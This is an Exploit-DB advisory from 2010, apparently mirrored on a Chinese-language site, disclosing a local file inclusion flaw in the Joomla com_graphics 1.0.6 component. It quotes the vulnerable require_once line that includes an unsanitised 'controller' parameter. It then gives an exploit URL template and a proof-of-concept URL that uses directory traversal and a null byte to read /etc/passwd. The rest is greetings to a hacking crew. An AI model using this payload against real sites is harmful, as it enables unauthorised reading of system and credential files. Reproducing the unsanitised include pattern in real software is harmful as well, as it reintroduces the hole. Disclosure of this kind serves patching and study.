Joomla! Component Graphics 1.0.6 – Local File Inclusion

  • 作者: wishnusakti + inc0mp13te
    日期: 2010-04-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12430/
  •  ================================================================================================
    
     Title: Joomla Component graphics (com_graphics) v1.0.6 LFI Vulnerability
     Vendor : http://htmlcoderhelper.com/
     Download : http://en.sourceforge.jp/frs/g_redir.php?m=jaist&f=%2Fjoomlagraphics%2Fcom_graphics.zip
    
     Date : 27 April 2010 - GMT +07:00 Jakarta, Indonesia
     Author : wishnusakti + inc0mp13te (HH)
     Contact: evileyes60117[at]yahoo.com
    
     ================================================================================================
    
     [+] Vulnerable
    
     ./components/com_graphics/graphics.php
    
     // Require specific controller if requested
    	if($controller = JRequest::getVar( 'controller' )) {
    	require_once( JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php' );
    	}
    
    
     [+] Exploit
    
     http://[site]/[path]/index.php?option=com_graphics&controller=[LFI]
    
     [+] PoC
    
     http://localhost/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
    
     ================================================================================================
    
     Very Special thanks :
     Penghuni #nob0dy priv8 Server
     (ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, cheche angela zhang, madonk, & Bot² Scan :D)
     
     en Semua Komunitas Hacking Tanah Air
     Peace Yo :)
    
    to all my friends : mywisdom, aurell, hafiz, xco, kiddies, xshadow, gblack, petimati, 
    cakill, krembis, biakkobar, hendri_note, xshadow, local_disaster, pradipta yoarsa
    
    
     ================================================================================================
    
    # ./wishnusakti #.inc0mp13te